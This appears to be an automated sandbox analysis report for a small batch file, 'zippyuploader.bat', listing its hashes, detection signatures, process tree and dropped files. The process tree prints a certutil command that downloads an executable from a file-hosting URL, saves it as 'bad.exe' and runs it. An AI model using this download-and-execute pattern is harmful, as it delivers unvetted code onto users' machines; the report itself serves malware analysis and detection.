Overview

overview

8

Static

static

zippyuploader.bat

windows7_x64

8

zippyuploader.bat

windows10_x64

8

zippyuploader.bat

windows10-2004_x64

8

Analysis

  • max time kernel
    650s
  • max time network
    1558s
  • platform
    windows7_x64
  • resource
    win7-20220310-en
  • submitted
    21-03-2022 16:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    zippyuploader.bat

  • Size

    107B

  • MD5

    0fac231074f90878c2283b2561ed906c

  • SHA1

    2c3421f0a6c20b8c6fb07ffe62526438a5169194

  • SHA256

    acfd8e0557e2efc01d981221e5e5e0fcd68f7231a72d3d46361294d9df43d984

  • SHA512

    fdc5f227244f4e0a76356aba17e38823e0e9bb0ffc344ce07b6bc9282c7192c08a9cbd42d157d13be0c378c9678aec4ea1ea6c7d663d21e732a73a2ceb6159b9

Score
8/10
upx

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\zippyuploader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\certutil.exe
      certutil.exe -urlcache -f https://www.zippyshare.com/zippyuploader/ZippyUploader.exe bad.exe
      2⤵
        PID:852
      • C:\Users\Admin\AppData\Local\Temp\bad.exe
        bad.exe
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of SetWindowsHookEx
        PID:1532

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bad.exe
      MD5

      ed323324bff4fbe54be6040ef429862c

      SHA1

      2182d6953bc33050d44ca585ca3e6e64cd0a6864

      SHA256

      88184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442

      SHA512

      72511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\bad.exe
      MD5

      ed323324bff4fbe54be6040ef429862c

      SHA1

      2182d6953bc33050d44ca585ca3e6e64cd0a6864

      SHA256

      88184dea2107e5fc67d1901391963b4b7a94381407c9fbb20936269acff6c442

      SHA512

      72511481199722a7d31ff3a50ac0a9f9126f8d124c22f1bb0457a43466ee2263c1bd5012209ee2f426dfcc17645842098e2594321eae3562dde86b25ade6831b

      Download Submit

    • memory/852-54-0x00000000FFDD1000-0x00000000FFDD3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1532-57-0x00000000765D1000-0x00000000765D3000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1532-58-0x00000000002B0000-0x00000000002B1000-memory.dmp

      Filesize

      4KB

      Download